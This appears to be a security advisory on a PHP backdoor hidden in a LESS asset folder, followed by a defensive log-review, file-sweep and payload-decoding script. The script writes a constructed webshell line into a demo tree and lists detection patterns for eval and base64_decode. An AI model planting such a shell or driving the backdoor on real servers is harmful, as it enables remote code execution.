Conjure Position Department Service Quality Evaluation System Backdoor Vulnerability in head.php
Vulnerability
A critical backdoor has been identified in Conjure Position Department Service Quality Evaluation System, affecting versions up to and including 1.0.11. The malicious code is an eval() call in the file 'public/assets/less/bootstrap-less/mixins/head.php', a PHP script placed inside a directory that should contain nothing but LESS stylesheet mixins. Sending a crafted 'payload' argument to this file results in remote code execution; the backdoor's position among legitimate front-end assets is what disguises it.
Impact
Exploitation of this backdoor yields remote code execution on the server: whatever PHP code the attacker supplies runs with the privileges of the web server (or PHP-FPM) process. Because the backdoor is part of the shipped files rather than something the attacker has to plant, it persists across sessions and restarts and can be used to spawn an interactive command shell, effectively compromising the entire host.
Reproduction
The backdoor is triggered by a POST request to 'public/assets/less/bootstrap-less/mixins/head.php' carrying an obfuscated payload: the PHP code to run is XOR-encrypted with a key hard-coded in the file and then base64-encoded before transmission. Once a session with the backdoor has been established, subsequent requests can execute stored or new commands, with the same encoding applied to all traffic so that the exchange does not look like plaintext PHP to signature-based filters. Note that XOR with a static key is obfuscation, not encryption: anyone who reads the key out of head.php can decode captured requests and responses, which matters when reconstructing what an attacker actually ran.
Remediation
Users are advised to remove the malicious 'head.php' file and to sweep the rest of the deployment for similar implants. No PHP file belongs under the static asset directories, so any '.php' found there deserves inspection, and files that pull from $_POST or $_REQUEST into eval() or base64_decode() are the ones to open first. Review web server access logs for POST requests to this file: a static asset path should only ever be fetched with GET, so any POST to it is evidence that the backdoor was used, regardless of the response status. Because the backdoor was present in the shipped files, assume the host may already have been accessed: change administrative passwords and API keys, invalidate all active user sessions, and, where the logs show successful use, rebuild the server from trusted sources rather than cleaning it in place. Long-term measures such as a secure development lifecycle and regular penetration testing help prevent future incidents.
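To support the log review and file-system sweep described above, the following triage script is an added example written for this page; it is not code from the affected product or from the original advisory. It assumes combined-format access logs, that the payload scheme is a repeating-key XOR applied before base64 (the advisory names XOR and a hard-coded key but not the key layout), and uses a placeholder HYPOTHETICAL_KEY, constructed sample log lines and a constructed stand-in for the deployed tree. It goes slightly beyond the single path in the advisory by flagging POST requests to any PHP file under the asset tree, since none should exist there.

```python
"""Triage helpers for the head.php backdoor: log check, asset sweep, payload decode.

Added example for this page, not code from the affected product or the advisory.
Assumptions: combined-format access logs; the payload scheme is repeating-key
XOR followed by base64 (the advisory names XOR and base64, not the key layout);
HYPOTHETICAL_KEY stands in for whatever key head.php actually embeds.
"""
import base64
import re
import tempfile
from pathlib import Path

BACKDOOR_PATH = "public/assets/less/bootstrap-less/mixins/head.php"
HYPOTHETICAL_KEY = b"k"  # placeholder, not the real key from head.php

# Combined log format: ip ident user [time] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
# Nothing under the static asset tree should ever be a PHP script.
ASSET_PHP_RE = re.compile(r"^/public/assets/.*\.php$")
# Constructs a backdoor needs and a LESS/CSS mixin never does.
MARKER_RE = re.compile(
    r"\b(eval|assert|base64_decode|gzinflate|str_rot13)\s*\(|\$_(POST|GET|REQUEST)\b"
)

# Constructed sample log lines for the demo, not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "GET /public/assets/less/bootstrap-less/mixins/head.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:12:00:02 +0000] "POST /public/assets/less/bootstrap-less/mixins/head.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.3 - - [10/Mar/2024:12:00:03 +0000] "GET /public/assets/css/app.css HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:12:00:04 +0000] "POST /public/assets/less/bootstrap-less/mixins/head.php HTTP/1.1" 200 1024 "-" "python-requests/2.31"
203.0.113.9 - - [10/Mar/2024:12:00:05 +0000] "POST /public/assets/img/x.php HTTP/1.1" 404 0 "-" "curl/8.0"
"""
# Constructed captured body: "phpinfo();" XOR'ed with HYPOTHETICAL_KEY, then base64.
CAPTURED_BODY = "GwMbAgUNBENCUA=="


def suspicious_requests(log_text: str) -> list[dict]:
    """POST requests to head.php, or to any .php under /public/assets/.

    A static asset path is only ever fetched with GET, so a POST there is a
    strong signal regardless of status (a 404 still records an attempt).
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        path = m["path"].split("?", 1)[0]
        if path.endswith("/" + BACKDOOR_PATH) or ASSET_PHP_RE.match(path):
            hits.append({"ip": m["ip"], "time": m["time"], "path": path,
                         "status": int(m["status"])})
    return hits


def sweep_assets(root: Path) -> list[dict]:
    """List PHP files under any 'assets' directory, ranked by dangerous markers.

    Location alone makes such a file suspicious; the markers say which to open first.
    """
    findings = []
    for php in sorted(root.rglob("*.php")):
        if "assets" not in php.parts:
            continue
        text = php.read_text(errors="replace")
        markers = sorted({m.group(0).split("(")[0].strip()
                          for m in MARKER_RE.finditer(text)})
        findings.append({"file": str(php.relative_to(root)),
                         "markers": markers, "suspicious": bool(markers)})
    return findings


def decode_payload(body: str, key: bytes) -> bytes:
    """Undo base64 + repeating-key XOR on a captured request body.

    XOR with a static key is obfuscation, not encryption: with the key read
    out of head.php, every captured exchange can be decoded this way.
    """
    raw = base64.b64decode(body)
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(raw))


def build_demo_tree() -> Path:
    """Constructed stand-in deployment: a benign mixin, a legitimate index.php
    and a webshell-style head.php. Not the real file contents."""
    root = Path(tempfile.mkdtemp())
    mixins = root / "public/assets/less/bootstrap-less/mixins"
    mixins.mkdir(parents=True)
    (mixins / "forms.less").write_text(".form-control { color: red; }")
    (mixins / "head.php").write_text(
        '<?php eval(base64_decode($_POST["payload"])); ?>')
    (root / "public/index.php").write_text("<?php echo 'ok';")
    return root


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print("suspicious POST:", hit)
    for finding in sweep_assets(build_demo_tree()):
        print("asset php:", finding)
    print("decoded body:", decode_payload(CAPTURED_BODY, HYPOTHETICAL_KEY))
```

Run it against real logs by replacing SAMPLE_LOG with the contents of the access log and pointing sweep_assets() at the web root; the sweep flags by location first and by markers second, so a PHP file under assets with no markers still appears in the output and should still be explained.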
